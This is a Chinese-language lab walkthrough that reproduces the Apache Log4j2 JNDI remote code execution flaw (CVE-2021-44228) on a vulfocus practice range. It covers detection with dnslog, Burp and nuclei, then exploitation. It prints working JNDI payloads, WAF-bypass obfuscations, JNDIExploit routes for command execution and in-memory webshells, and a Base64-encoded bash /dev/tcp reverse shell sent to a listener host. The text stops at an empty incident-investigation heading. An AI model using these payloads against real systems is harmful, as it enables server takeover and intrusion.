Apache log4j2 远程命令执行漏洞复现
前言
Apache log4j2 RCE漏洞(CVE-2021-44228)一出,各大行业知名厂商纷纷中招,与之前的fastjson、shiro漏洞相比更为严重,预计在之后的三四年中漏洞会一直存在。此漏洞影响范围特别广泛,漏洞利用门槛低,危害程度非常大,如果被攻击者恶意利用,危害程度不亚于2017年爆发的“永恒之蓝”漏洞。以下图片来源于网络
0x01 漏洞简介
Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。
- 漏洞编号:CVE-2021-44228
- 漏洞等级:紧急
- CVSS评分:10(最高级)
- 影响版本:Apache log4j2 2.0 - 2.14.1
- 安全版本:Apache log4j-2.15.0-rc2
更多关于此漏洞的详细分析:Log4j高危漏洞!具体原因解析!全网第一
0x02 影响范围
该漏洞影响范围极广、危害极大,主要由于该组件应用范围十分广泛,所有使用该组件的所有产品都会受到漏洞影响,因此对其下游造成的软件供应链安全隐患巨大。 目前已知的可能受影响的应用及组件包括但不限于如下:
组件名称 | 版本信息 |
|---|---|
Apache Struts2 | 全版本 |
ElasticSearch | 5.x,6.x,7.x,8.0.0beta1,8.0.0alpha1和8.0.0alpha2 |
Logstash | 5.0.0至最新 |
Apache Flink | 1.11.0-rc1 到 1.14.0 |
Apache Druid | 0.7.x以上 |
Hadoop Hive | 2.x和3.x |
Apache Log4j SLF4J Binding | ‘2.14.1’, ‘2.14.0’, ‘2.13.3’, ‘2.13.2’, ‘2.13.1’, ‘2.13.0’, ‘2.12.1’, ‘2.12.0’, ‘2.11.2’, ‘2.11.1’, ‘2.11.0’, ‘2.10.0’, ‘2.9.1’, ‘2.9.0’, ‘2.8.2’, ‘2.8.1’, ‘2.8’, ‘2.7’, ‘2.6.2’, ‘2.6.1’, ‘2.6’, ‘2.5’, ‘2.4.1’, ‘2.4’, ‘2.3’, ‘2.2’, ‘2.1’, ‘2.0.2’, ‘2.0.1’, ‘2.0’, ‘2.0-rc2’, ‘2.0-rc1’, ‘2.0-beta9’, ‘2.0-beta8’, ‘2.0-beta7’, ‘2.0-beta6’, ‘2.0-beta5’ |
Spring Boot | ‘2.6.1’, ‘2.6.0’, ‘2.5.7’, ‘2.5.6’, ‘2.5.5’, ‘2.5.4’, ‘2.5.3’, ‘2.5.2’, ‘2.5.1’, ‘2.5.0’, ‘2.4.13’, ‘2.4.12’, ‘2.4.11’, ‘2.4.10’, ‘2.4.9’, ‘2.4.8’, ‘2.4.7’, ‘2.4.6’, ‘2.4.5’, ‘2.4.4’, ‘2.4.3’, ‘2.4.2’, ‘2.4.1’, ‘2.4.0’, ‘2.3.12.RELEASE’, ‘2.3.11.RELEASE’, ‘2.3.10.RELEASE’, ‘2.3.9.RELEASE’, ‘2.3.8.RELEASE’, ‘2.3.7.RELEASE’, ‘2.3.6.RELEASE’, ‘2.3.5.RELEASE’, ‘2.3.4.RELEASE’, ‘2.3.3.RELEASE’, ‘2.3.2.RELEASE’, ‘2.3.1.RELEASE’, ‘2.3.0.RELEASE’, ‘2.2.13.RELEASE’, ‘2.2.12.RELEASE’, ‘2.2.11.RELEASE’, ‘2.2.10.RELEASE’, ‘2.2.9.RELEASE’, ‘2.2.8.RELEASE’, ‘2.2.7.RELEASE’, ‘2.2.6.RELEASE’, ‘2.2.5.RELEASE’, ‘2.2.4.RELEASE’, ‘2.2.3.RELEASE’, ‘2.2.2.RELEASE’, ‘2.2.1.RELEASE’, ‘2.2.0.RELEASE’, ‘2.1.18.RELEASE’, ‘2.1.17.RELEASE’, ‘2.1.16.RELEASE’, ‘2.1.15.RELEASE’, ‘2.1.14.RELEASE’, ‘2.1.13.RELEASE’, ‘2.1.12.RELEASE’, ‘2.1.11.RELEASE’, ‘2.1.10.RELEASE’, ‘2.1.9.RELEASE’, ‘2.1.8.RELEASE’, ‘2.1.7.RELEASE’, ‘2.1.6.RELEASE’, ‘2.1.5.RELEASE’, ‘2.1.4.RELEASE’, ‘2.1.3.RELEASE’, ‘2.1.2.RELEASE’, ‘2.1.1.RELEASE’, ‘2.1.0.RELEASE’, ‘2.0.9.RELEASE’, ‘2.0.8.RELEASE’, ‘2.0.7.RELEASE’, ‘2.0.6.RELEASE’, ‘2.0.5.RELEASE’, ‘2.0.4.RELEASE’, ‘2.0.3.RELEASE’, ‘2.0.2.RELEASE’, ‘2.0.1.RELEASE’, ‘2.0.0.RELEASE’, ‘1.5.22.RELEASE’, ‘1.5.21.RELEASE’, ‘1.5.20.RELEASE’, ‘1.5.19.RELEASE’, ‘1.5.18.RELEASE’, ‘1.5.17.RELEASE’, ‘1.5.16.RELEASE’, ‘1.5.15.RELEASE’, ‘1.5.14.RELEASE’, ‘1.5.13.RELEASE’, ‘1.5.12.RELEASE’, ‘1.5.11.RELEASE’, ‘1.5.10.RELEASE’, ‘1.5.9.RELEASE’, ‘1.5.8.RELEASE’, ‘1.5.7.RELEASE’, ‘1.5.6.RELEASE’, ‘1.5.5.RELEASE’, ‘1.5.4.RELEASE’, ‘1.5.3.RELEASE’, ‘1.5.2.RELEASE’, ‘1.5.1.RELEASE’, ‘1.5.0.RELEASE’, ‘1.4.7.RELEASE’, ‘1.4.6.RELEASE’, ‘1.4.5.RELEASE’, ‘1.4.4.RELEASE’, ‘1.4.3.RELEASE’, ‘1.4.2.RELEASE’, ‘1.4.1.RELEASE’, ‘1.4.0.RELEASE’, ‘1.3.8.RELEASE’, ‘1.3.7.RELEASE’, ‘1.3.6.RELEASE’, ‘1.3.5.RELEASE’, ‘1.3.4.RELEASE’, ‘1.3.3.RELEASE’, ‘1.3.2.RELEASE’, ‘1.3.1.RELEASE’, ‘1.3.0.RELEASE’, ‘1.2.8.RELEASE’, ‘1.2.7.RELEASE’, ‘1.2.6.RELEASE’, ‘1.2.5.RELEASE’, ‘1.2.4.RELEASE’, ‘1.2.3.RELEASE’, ‘1.2.2.RELEASE’, ‘1.2.1.RELEASE’, ‘1.2.0.RELEASE’, ‘1.1.12.RELEASE’, ‘1.1.11.RELEASE’, ‘1.1.10.RELEASE’, ‘1.1.9.RELEASE’, ‘1.1.8.RELEASE’, ‘1.1.7.RELEASE’, ‘1.1.6.RELEASE’, ‘1.1.5.RELEASE’, ‘1.1.4.RELEASE’, ‘1.1.3.RELEASE’, ‘1.1.2.RELEASE’, ‘1.1.1.RELEASE’, ‘1.1.0.RELEASE’, ‘1.0.2.RELEASE’, ‘1.0.1.RELEASE’, ‘1.0.0.RELEASE’ |
Camel :: Core | ‘3.13.0’, ‘3.12.0’, ‘3.11.4’, ‘3.11.3’, ‘3.11.2’, ‘3.11.1’, ‘3.11.0’, ‘3.10.0’, ‘3.9.0’, ‘3.8.0’, ‘3.7.6’, ‘3.7.5’, ‘3.7.4’, ‘3.7.3’, ‘3.7.2’, ‘3.7.1’, ‘3.7.0’, ‘3.6.0’, ‘3.5.0’, ‘3.4.6’, ‘3.4.5’, ‘3.4.4’, ‘3.4.3’, ‘3.4.2’, ‘3.4.1’, ‘3.4.0’, ‘3.3.0’, ‘3.2.0’, ‘3.1.0’, ‘3.0.1’, ‘3.0.0’, ‘2.25.4’, ‘2.25.3’, ‘2.25.2’, ‘2.25.1’, ‘2.25.0’, ‘2.24.3’, ‘2.24.2’, ‘2.24.1’, ‘2.24.0’, ‘2.23.4’, ‘2.23.3’, ‘2.23.2’, ‘2.23.1’, ‘2.23.0’, ‘2.22.5’, ‘2.22.4’, ‘2.22.3’, ‘2.22.2’, ‘2.22.1’, ‘2.22.0’, ‘2.21.5’, ‘2.21.4’, ‘2.21.3’, ‘2.21.2’, ‘2.21.1’, ‘2.21.0’, ‘2.20.4’, ‘2.20.3’, ‘2.20.2’, ‘2.20.1’, ‘2.20.0’, ‘2.19.5’, ‘2.19.4’, ‘2.19.3’, ‘2.19.2’, ‘2.19.1’, ‘2.19.0’, ‘2.18.5’, ‘2.18.4’, ‘2.18.3’, ‘2.18.2’, ‘2.18.1’, ‘2.18.0’, ‘2.17.7’, ‘2.17.6’, ‘2.17.5’, ‘2.17.4’, ‘2.17.3’, ‘2.17.2’, ‘2.17.1’, ‘2.17.0’, ‘2.16.5’, ‘2.16.4’, ‘2.16.3’, ‘2.16.2’, ‘2.16.1’, ‘2.16.0’, ‘2.15.6’, ‘2.15.5’, ‘2.15.4’, ‘2.15.3’, ‘2.15.2’, ‘2.15.1’, ‘2.15.0’, ‘2.14.4’, ‘2.14.3’, ‘2.14.2’, ‘2.14.1’, ‘2.14.0’, ‘2.13.4’, ‘2.13.3’, ‘2.13.2’, ‘2.13.1’, ‘2.13.0’, ‘2.12.5’, ‘2.12.4’, ‘2.12.3’, ‘2.12.2’, ‘2.12.1’, ‘2.12.0’, ‘2.11.4’, ‘2.11.3’, ‘2.11.2’, ‘2.11.1’, ‘2.11.0’, ‘2.10.7’, ‘2.10.6’, ‘2.10.5’, ‘2.10.4’, ‘2.10.3’, ‘2.10.2’, ‘2.10.1’, ‘2.10.0’, ‘2.9.8’, ‘2.9.7’, ‘2.9.6’, ‘2.9.5’, ‘2.9.4’, ‘2.9.3’, ‘2.9.2’, ‘2.9.1’, ‘2.9.0’, ‘2.8.6’, ‘2.8.5’, ‘2.8.4’, ‘2.8.3’, ‘2.8.2’, ‘2.8.1’, ‘2.8.0’, ‘2.7.5’, ‘2.7.4’, ‘2.7.3’, ‘2.7.2’, ‘2.7.1’, ‘2.7.0’, ‘2.6.0’, ‘2.5.0’, ‘2.4.0’, ‘2.3.0’, ‘2.2.0’, ‘2.1.0’, ‘2.0.0’, ‘1.6.4’, ‘1.6.3’, ‘1.6.2’, ‘1.6.1’, ‘1.6.0’, ‘1.5.0’, ‘1.4.0’, ‘1.3.0’, ‘1.2.0’, ‘1.1.0’, ‘1.0.0’, ‘3.0.0-M4’, ‘3.0.0-M3’, ‘3.0.0-M2’, ‘3.0.0-M1’, ‘2.0-M3’, ‘2.0-M2’, ‘2.0-M1’, ‘3.0.0-RC3’, ‘3.0.0-RC2’, ‘3.0.0-RC1’, ‘2.9.0-RC1’ |
JUnit Vintage Engine | ‘5.8.2’, ‘5.8.1’, ‘5.8.0’, ‘5.7.2’, ‘5.7.1’, ‘5.7.0’, ‘5.6.3’, ‘5.6.2’, ‘5.6.1’, ‘5.6.0’, ‘5.5.2’, ‘5.5.1’, ‘5.5.0’, ‘5.4.2’, ‘5.4.1’, ‘5.4.0’, ‘5.3.2’, ‘5.3.1’, ‘5.3.0’, ‘5.2.0’, ‘5.1.1’, ‘5.1.0’, ‘4.12.3’, ‘4.12.2’, ‘4.12.1’, ‘4.12.0’, ‘5.8.0-M1’, ‘5.7.0-M1’, ‘5.6.0-M1’, ‘5.5.0-M1’, ‘5.4.0-M1’, ‘5.3.0-M1’, ‘5.2.0-M1’, ‘5.1.0-M2’, ‘5.1.0-M1’, ‘4.12.0-M6’, ‘4.12.0-M5’, ‘4.12.0-M4’, ‘4.12.0-M3’, ‘4.12.0-M2’, ‘4.12.0-M1’, ‘5.8.0-RC1’, ‘5.7.0-RC1’, ‘5.6.0-RC1’, ‘5.5.0-RC2’, ‘5.5.0-RC1’, ‘5.4.0-RC2’, ‘5.4.0-RC1’, ‘5.3.0-RC1’, ‘5.2.0-RC1’, ‘5.1.0-RC1’, ‘4.12.0-RC3’, ‘4.12.0-RC2’, ‘4.12.0-RC1’ |
JBoss Logging 3 | ‘3.4.2.Final’, ‘3.4.1.Final’, ‘3.4.0.Final’, ‘3.3.3.Final’, ‘3.3.2.Final’, ‘3.3.1.Final’, ‘3.3.0.Final’, ‘3.2.1.Final’, ‘3.2.0.Final’, ‘3.1.0.CR2’, ‘3.1.0.CR1’, ‘3.0.0.CR1’, ‘3.3.0.Beta1’, ‘3.2.0.Beta1’, ‘3.1.0.Beta3’, ‘3.1.0.Beta2’, ‘3.1.0.Beta1’, ‘3.0.0.Beta5’, ‘3.0.0.Beta4’, ‘3.0.0.Beta3’, ‘3.0.0.Beta2’, ‘3.0.0.Beta1’ |
HikariCP | ‘5.0.0’, ‘4.0.3’, ‘4.0.2’, ‘4.0.1’, ‘4.0.0’, ‘3.4.5’, ‘3.4.4’, ‘3.4.3’, ‘3.4.2’, ‘3.4.1’, ‘3.4.0’, ‘3.3.1’, ‘3.3.0’, ‘3.2.0’, ‘3.1.0’, ‘3.0.0’, ‘2.7.9’, ‘2.7.8’, ‘2.7.7’, ‘2.7.6’, ‘2.7.5’, ‘2.7.4’, ‘2.7.3’, ‘2.7.2’, ‘2.7.1’, ‘2.7.0’, ‘2.6.3’, ‘2.6.2’, ‘2.6.1’, ‘2.6.0’, ‘2.5.1’, ‘2.5.0’, ‘2.4.7’, ‘2.4.6’, ‘2.4.5’, ‘2.4.4’, ‘2.4.3’, ‘2.4.2’, ‘2.4.1’, ‘2.4.0’, ‘2.3.13’, ‘2.3.12’, ‘2.3.11’, ‘2.3.10’, ‘2.3.9’, ‘2.3.8’, ‘2.3.7’, ‘2.3.6’, ‘2.3.5’, ‘2.3.4’, ‘2.3.3’, ‘2.3.2’, ‘2.3.1’, ‘2.3.0’, ‘2.2.5’, ‘2.2.4’, ‘2.2.3’, ‘2.2.2’, ‘2.2.1’, ‘2.2.0’, ‘2.1.0’, ‘2.0.1’, ‘2.0.0’, ‘1.4.0’, ‘1.3.9’, ‘1.3.8’, ‘1.3.7’, ‘1.3.6’, ‘1.3.5’, ‘1.3.4’, ‘1.3.3’, ‘1.3.2’, ‘1.3.1’, ‘1.3.0’, ‘1.2.9’, ‘1.2.8’, ‘1.2.7’, ‘1.2.6’, ‘1.2.5’, ‘1.2.4’, ‘1.2.3’, ‘1.2.2’, ‘1.2.1’, ‘1.1.9’, ‘1.1.8’, ‘1.1.7’, ‘1.1.6’, ‘1.1.5’, ‘1.1.4’, ‘1.1.3’ |
Logging | ‘1.1.0’, ‘1.0.0’, ‘0.6.0’, ‘0.5.0’, ‘0.4.1’, ‘0.4.0’, ‘0.3.1’, ‘0.3.0’, ‘0.2.6’, ‘0.2.4’, ‘0.2.3’, ‘0.2.2’, ‘0.2.0’, ‘0.1.2’, ‘0.1.1’, ‘0.1.0’, ‘0.5.0-alpha.1’, ‘0.5.0-alpha’ |
Jedis | ‘3.7.0’, ‘3.6.3’, ‘3.6.2’, ‘3.6.1’, ‘3.6.0’, ‘3.5.2’, ‘3.5.1’, ‘3.5.0’, ‘3.4.1’, ‘3.4.0’, ‘3.3.0’, ‘3.2.0’, ‘3.1.0’, ‘3.0.1’, ‘3.0.0’, ‘2.10.2’, ‘2.10.1’, ‘2.10.0’, ‘2.9.3’, ‘2.9.2’, ‘2.9.1’, ‘2.9.0’, ‘2.8.2’, ‘2.8.1’, ‘2.8.0’, ‘2.7.3’, ‘2.7.2’, ‘2.7.1’, ‘2.7.0’, ‘2.6.3’, ‘2.6.2’, ‘2.6.1’, ‘2.6.0’, ‘2.5.2’, ‘2.5.1’, ‘2.5.0’, ‘2.4.2’, ‘2.4.1’, ‘2.4.0’, ‘2.3.1’, ‘2.3.0’, ‘2.2.1’, ‘2.2.0’, ‘2.1.0’, ‘2.0.0’, ‘1.5.2’, ‘1.5.1’, ‘1.5.0’, ‘1.4.0’, ‘1.3.1’, ‘1.3.0’, ‘jedis-3.6.2’, ‘3.1.0-m4’, ‘3.1.0-m3’, ‘3.1.0-m2’, ‘3.1.0-m1’, ‘3.0.0-m1’, ‘2.10.0-m1’, ‘3.7.0-RC1’, ‘3.6.0-RC1’, ‘3.1.0-rc2’, ‘3.1.0-rc’, ‘3.0.1-rc1’, ‘3.0.0-rc1’, ‘2.10.0-rc1’, ‘1.5.0-RC2’, ‘1.5.0-RC1’, ‘4.0.0-beta4’, ‘4.0.0-beta3’, ‘4.0.0-beta2’, ‘4.0.0-beta1’ |
WSO2 Carbon Kernel Core | ‘5.2.13’, ‘5.2.8’, ‘5.2.7’, ‘5.2.6’, ‘5.2.5’, ‘5.2.4’, ‘5.2.3’, ‘5.2.2’, ‘5.2.1’, ‘4.6.2’, ‘4.6.1’, ‘4.6.0’, ‘4.5.1’, ‘4.4.37’, ‘4.4.36’, ‘4.4.35’, ‘4.4.34’, ‘4.4.33’, ‘4.4.32’, ‘4.4.31’, ‘4.4.30’, ‘4.4.29’, ‘4.4.28’, ‘4.4.27’, ‘4.4.26’, ‘4.4.25’, ‘4.4.24’, ‘4.4.23’, ‘4.4.22’, ‘4.4.21’, ‘4.4.20’, ‘4.4.19’, ‘4.7.0-m6’, ‘4.7.0-m5’, ‘4.7.0-m4’, ‘4.7.0-m3’, ‘4.7.0-m2’, ‘4.7.0-m1’, ‘4.6.3-m5’, ‘4.6.3-m4’, ‘4.6.3-m3’, ‘4.6.3-m2’, ‘4.6.3-m1’, ‘4.6.2-m9’, ‘4.6.2-m8’, ‘4.6.2-m7’, ‘4.6.2-m6’, ‘4.6.2-m5’, ‘4.6.2-m4’, ‘4.6.2-m3’, ‘4.6.2-m2’, ‘4.6.2-m1’, ‘4.6.1-m8’, ‘4.6.1-m7’, ‘4.6.1-m6’, ‘4.6.1-m5’, ‘4.6.1-m4’, ‘4.6.1-m3’, ‘4.6.1-m2’, ‘4.6.1-m1’, ‘4.6.1-beta2’, ‘4.6.1-beta’, ‘4.6.0-beta2’, ‘4.6.1-alpha3’, ‘4.6.1-alpha2’, ‘4.6.1-alpha’, ‘4.6.0-alpha2’, ‘4.6.0-alpha’ |
以上应用/组件受影响版本统计数据来自:微步情报局 微步在线研究响应中心
0x03 演示环境
演示靶场采用vulfocus在线平台的log4j2-rce靶场,该靶场漏洞位置存在于/hello路径
vulfocus的log4j2-rce靶场的请求数据包如下:
POST /hello HTTP/1.1
Host: vulfocus.fofa.so:30861
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
payload=xxxxxx漏洞验证过程使用dnslog、burpsuite、JNDIExploit以及拥有公网ip的vps的服务器,建议java依赖环境采用jdk8u191以下版本进行复现。
- dnslog:http://www.dnslog.cn/
- JNDIExploit:https://github.com/feihong-cs/JNDIExploit
- jdk8:https://www.wmzhe.com/soft-70159.html
0x04 漏洞检测
1. dnslog手动验证
首先在dnslog平台生成一个地址,然后利用该地址构造payload让靶机对dnslog平台发起请求:
POST /hello HTTP/1.1
Host: vulfocus.fofa.so:30861
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
payload=${jndi:ldap://03ibvw.dnslog.cn}请求成功后,dnslog平台点击 Refresh Record 后会接收靶机的请求,记录了靶机的请求的ip地址以及响应时间
通过上述步骤验证,在演示靶场环境中可以确定漏洞是真实存在的,但在真实环境中只能说初步判断目标是有大概率存在漏洞的,由于真实环境中的一些复杂因素,即使dnslog请求成功了也不能完全保证目标一定存在rce漏洞。
2. log4j2 burp 被动扫描
log4j2_burp_scan log4j2 是一款被动的 burp rce扫描工具,支持get post cookie 全参数识别,在 ceye.io api速率限制下,最大线程扫描每一个参数,记录过滤已检测地址。
- 2021-12-11 增加了header头部检测,HSOT,User-agent,referer,Origin,AUTH,Forwarded-For-Ip,Forwarded-For,Forwarded,X-Client-IP,X-Rewrite-URL
- 下载地址:https://pan.baidu.com/s/1hXCPj9tlZTC3799h9sKQjA 提取码:
7b7v
打开 log4j-1.1.py文件将修改自己ceye账号的API Token和Identifier值,没有账号的话可以去注册一个ceye.io
打开BurpSuite->Extender->Options,加载插件前先配置好Jython和python2的模块文件夹,否则加载插件会不成功
- Jython 点击下载 提取码: h6br
然后打开BurpSuite->Extender->Extensions,加载log4j2_burp_scan插件即可
浏览器开启BurpSuite代理,再次访问请求漏洞靶场(注意带上测试参数),即可被动扫描出漏洞
3. log4j请求头Fuzz测试
log4j-fuzz-head-poc针对log4j来批量fuzz请求头,有效检测一些头部存在的安全风险,nuclei默认使用interactsh的dnslog
支持以下请求头字段检测:
X-Client-IP
X-Remote-IP
X-Remote-Addr
X-Forwarded-For
X-Originating-IP
User-Agent
Referer
CF-Connecting_IP
True-Client-IP
X-Forwarded-For
Originating-IP
X-Real-IP
X-Client-IP
Forwarded
Client-IP
Contact
X-Wap-Profile
X-Api-Versionv2版本添加了绕过rc1的poc 也同时能绕过常见主流waf拦截,还有高版本jdk绕过
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}首先需要把nuclei工具下载安装到本地
https://github.com/projectdiscovery/nuclei然后下载log4j-fuzz-head-poc到nuclei的同目录下
https://github.com/test502git/log4j-fuzz-head-poc执行如下命令即可快速针对log4j批量fuzz请求头检测漏洞
# 单个检测 速率为30
./nuclei -t log4j-fuzz-head-poc.yaml -u http://www.test.com -o res.txt -rl 30
# 批量检测 速率为30
./nuclei -t log4j-fuzz-head-poc.yaml -l urls.txt -o res.txt -rl 30 用-p参数指定BurpSuite的代理,可以在BurpSuite中看到请求和响应包的详细信息
示例:
./nuclei -t log4j-fuzz-head-poc-v2.yaml -u http://vulfocus.fofa.so:52197/ -o res.txt -rl 30 -p http://127.0.0.1:8080
参数说明:
-t 要检测的模板种类
-u 测试目标地址
-o 结果保存到文件
-rl 速率
-p 指定代理也可以直接通过-debug参数,在终端中看到请求和响应包的详细信息
0x05 漏洞复现
1. JNDIExploit
JNDIExploit是一款用于 JNDI注入 利用的工具,大量参考/引用了 Rogue JNDI 项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。
- 下载地址: https://pan.baidu.com/s/1lmday3MHoPHI5f9rHNjV2Q 提取码:
5686
使用 java -jar JNDIExploit.jar -u 查看支持的 LDAP 格式
Supported LADP Queries
* all words are case INSENSITIVE when send to ldap server
[+] Basic Queries: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params], e.g.
ldap://127.0.0.1:1389/Basic/Dnslog/[domain]
ldap://127.0.0.1:1389/Basic/Command/[cmd]
ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]
ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port] ---windows NOT supported
ldap://127.0.0.1:1389/Basic/TomcatEcho
ldap://127.0.0.1:1389/Basic/SpringEcho
ldap://127.0.0.1:1389/Basic/WeblogicEcho
ldap://127.0.0.1:1389/Basic/TomcatMemshell1
ldap://127.0.0.1:1389/Basic/TomcatMemshell2 ---need extra header [Shell: true]
ldap://127.0.0.1:1389/Basic/JettyMemshell
ldap://127.0.0.1:1389/Basic/WeblogicMemshell1
ldap://127.0.0.1:1389/Basic/WeblogicMemshell2
ldap://127.0.0.1:1389/Basic/JBossMemshell
ldap://127.0.0.1:1389/Basic/WebsphereMemshell
ldap://127.0.0.1:1389/Basic/SpringMemshell
[+] Deserialize Queries: ldap://127.0.0.1:1389/Deserialization/[GadgetType]/[PayloadType]/[Params], e.g.
ldap://127.0.0.1:1389/Deserialization/URLDNS/[domain]
ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK1/Dnslog/[domain]
ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK2/Command/Base64/[base64_encoded_cmd]
ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils1/ReverseShell/[ip]/[port] ---windows NOT supported
ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils2/TomcatEcho
ldap://127.0.0.1:1389/Deserialization/C3P0/SpringEcho
ldap://127.0.0.1:1389/Deserialization/Jdk7u21/WeblogicEcho
ldap://127.0.0.1:1389/Deserialization/Jre8u20/TomcatMemshell1
ldap://127.0.0.1:1389/Deserialization/CVE_2020_2555/WeblogicMemshell1
ldap://127.0.0.1:1389/Deserialization/CVE_2020_2883/WeblogicMemshell2 ---ALSO support other memshells
[+] TomcatBypass Queries
ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain]
ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd]
ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]
ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port] ---windows NOT supported
ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho
ldap://127.0.0.1:1389/TomcatBypass/SpringEcho
ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell1
ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell2 ---need extra header [Shell: true]
ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell
[+] GroovyBypass Queries
ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd]
ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]
[+] WebsphereBypass Queries
ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory]
ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain]
ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd]
ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]
ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port] ---windows NOT supported
ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell
ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path] ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp目前支持的所有 PayloadType 为
Dnslog: 用于产生一个DNS请求,与 DNSLog平台配合使用,对Linux/Windows进行了简单的适配
Command: 用于执行命令,如果命令有特殊字符,支持对命令进行 Base64编码后传输
ReverseShell: 用于 Linux 系统的反弹shell,方便使用
TomcatEcho: 用于在中间件为 Tomcat 时命令执行结果的回显,通过添加自定义header cmd: whoami 的方式传递想要执行的命令
SpringEcho: 用于在框架为 SpringMVC/SpringBoot 时命令执行结果的回显,通过添加自定义header cmd: whoami 的方式传递想要执行的命令
WeblogicEcho: 用于在中间件为 Weblogic 时命令执行结果的回显,通过添加自定义header cmd: whoami 的方式传递想要执行的命令
TomcatMemshell1: 用于植入Tomcat内存shell, 支持Behinder shell 与 Basic cmd shell
TomcatMemshell2: 用于植入Tomcat内存shell, 支持Behinder shell 与 Basic cmd shell, 使用时需要添加额外的HTTP Header Shell: true, 推荐使用此方式
SpringMemshell: 用于植入Spring内存shell, 支持Behinder shell 与 Basic cmd shell
WeblogicMemshell1: 用于植入Weblogic内存shell, 支持Behinder shell 与 Basic cmd shell
WeblogicMemshell2: 用于植入Weblogic内存shell, 支持Behinder shell 与 Basic cmd shell,推荐使用此方式
JettyMemshell: 用于植入Jetty内存shell, 支持Behinder shell 与 Basic cmd shell
JBossMemshell: 用于植入JBoss内存shell, 支持Behinder shell 与 Basic cmd shell
WebsphereMemshell: 用于植入Websphere内存shell, 支持Behinder shell 与 Basic cmd shell目前支持的所有 GadgetType 为
URLDNS
CommonsBeanutils1
CommonsBeanutils2
CommonsCollectionsK1
CommonsCollectionsK2
C3P0
Jdk7u21
Jre8u20
CVE_2020_2551
CVE_2020_2883WebsphereBypass 中的 3 个动作:
list:基于XXE查看目标服务器上的目录或文件内容
upload:基于XXE的jar协议将恶意jar包上传至目标服务器的临时目录
rce:加载已上传至目标服务器临时目录的jar包,从而达到远程代码执行的效果(这一步本地未复现成功,抛java.lang.IllegalStateException: For application client runtime, the client factory execute on a managed server thread is not allowed.异常,有复现成功的小伙伴麻烦指导下)2. VPS部署ldap服务
将JNDIExploit传到vps服务器上并执行如下命令
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i xx.xx.xx.xx
必选参数:
* -i, --ip # vps公网ip
可选参数:
-l, --ldapPort # 指定Ldap端口 (默认: 1389)
-p, --httpPort # 指定Http端口 (默认: 8080)3. 命令执行回显
JNDIExploit支持以下几种回显命令方式:
ldap://127.0.0.1:1389/Basic/TomcatEcho
ldap://127.0.0.1:1389/Basic/SpringEcho
ldap://127.0.0.1:1389/Basic/WeblogicEcho
ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils2/TomcatEcho
ldap://127.0.0.1:1389/Deserialization/C3P0/SpringEcho
ldap://127.0.0.1:1389/Deserialization/Jdk7u21/WeblogicEcho
ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho
ldap://127.0.0.1:1389/TomcatBypass/SpringEcho使用方法就是在用回显的payload时,在请求头中添加cmd字段和要执行的命令即可
获取靶机中的flag
4. 反弹主机shell
首先在vps上开启端口监听
nc -lvvp 8888构造payload,将要执行的命令进行base64编码(注意需要将base64加密后的“+”号进行url编码 ,burpsuite中需要双重url编码,否则“+”号会被当成空格解析掉,导致命令执行不成功)
原始命令:bash -i >& /dev/tcp/xx.xx.xx.xx/8888 0>&1
Base64编码:YmFzaCAtaSA+JiAvZGV2L3RjcC8xNjIuMTQuMTE1LjI0Ni84ODg4IDA+JjE=
+号双重url编码:YmFzaCAtaSA%25%32%62JiAvZGV2L3RjcC8xNjIuMTQuMTE1LjI0Ni84ODg4IDA%25%32%62JjE=
最终payload:${jndi:ldap://xx.xx.xx.xx:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%25%32%62JiAvZGV2L3RjcC8xNjIuMTQuMTE1LjI0Ni84ODg4IDA%25%32%62JjE=}payload执行成功后,vps上就会接收到反弹的主机shell
0x06 入侵排查
1. 日志排查
